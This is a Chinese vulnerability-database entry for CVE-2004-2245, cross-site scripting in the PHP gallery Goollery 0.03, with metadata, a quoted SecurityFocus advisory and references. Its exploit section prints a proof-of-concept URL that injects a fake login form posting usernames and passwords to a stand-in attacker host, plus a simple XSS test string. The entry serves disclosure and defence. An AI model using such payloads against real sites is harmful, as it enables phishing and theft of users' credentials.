Goollery多个跨站脚本攻击漏洞

Goollery多个跨站脚本攻击漏洞

漏洞ID 1108257 漏洞类型 跨站脚本
发布时间 2004-11-02 更新时间 2005-10-20
图片[1]-Goollery多个跨站脚本攻击漏洞-安全小百科CVE编号 CVE-2004-2245
图片[2]-Goollery多个跨站脚本攻击漏洞-安全小百科CNNVD-ID CNNVD-200412-1134
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24719
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1134
|漏洞详情
Goollery0.03版本存在跨站脚本攻击(XSS)漏洞。远程攻击者借助(1)viewalbum.php的page参数(2)viewpic.php的btopage参数注入任意HTML或web脚本。
|漏洞EXP
source: http://www.securityfocus.com/bid/11587/info
 
It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
 
These problems present themselves when malicious HTML and script code is sent to the application through the 'page' parameter of several scripts.
 
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user.

http://www.example.com/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=<form%20action="http://www.atacker.com/save2db.asp"%20method="post">Username:<input%20name="us
ername"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login"></fo
rm>&sess=daf5c642ade1162f15c4eb4b7e89da17

http://www.example.com/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=<body>XSS%20poW@!!</body>&sess=daf5c642ade1162f15c4eb4b7e89da17
|参考资料

来源:OSVDB
名称:11320
链接:http://www.osvdb.org/11320
来源:OSVDB
名称:11319
链接:http://www.osvdb.org/11319
来源:XF
名称:goollery-viewalbum-viewpic-xss(17957)
链接:http://xforce.iss.net/xforce/xfdb/17957
来源:BID
名称:11587
链接:http://www.securityfocus.com/bid/11587
来源:www.osvdb.org
链接:http://www.osvdb.org/ref/11/11xxx-goollery_multiple.txt
来源:OSVDB
名称:11318
链接:http://www.osvdb.org/11318
来源:SECTRACK
名称:1012062
链接:http://securitytracker.com/id?1012062

相关推荐: SCO OpenServer XBase Buffer Overflow Vulnerabilities

SCO OpenServer XBase Buffer Overflow Vulnerabilities 漏洞ID 1104708 漏洞类型 Boundary Condition Error 发布时间 1999-06-14 更新时间 1999-06-14 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享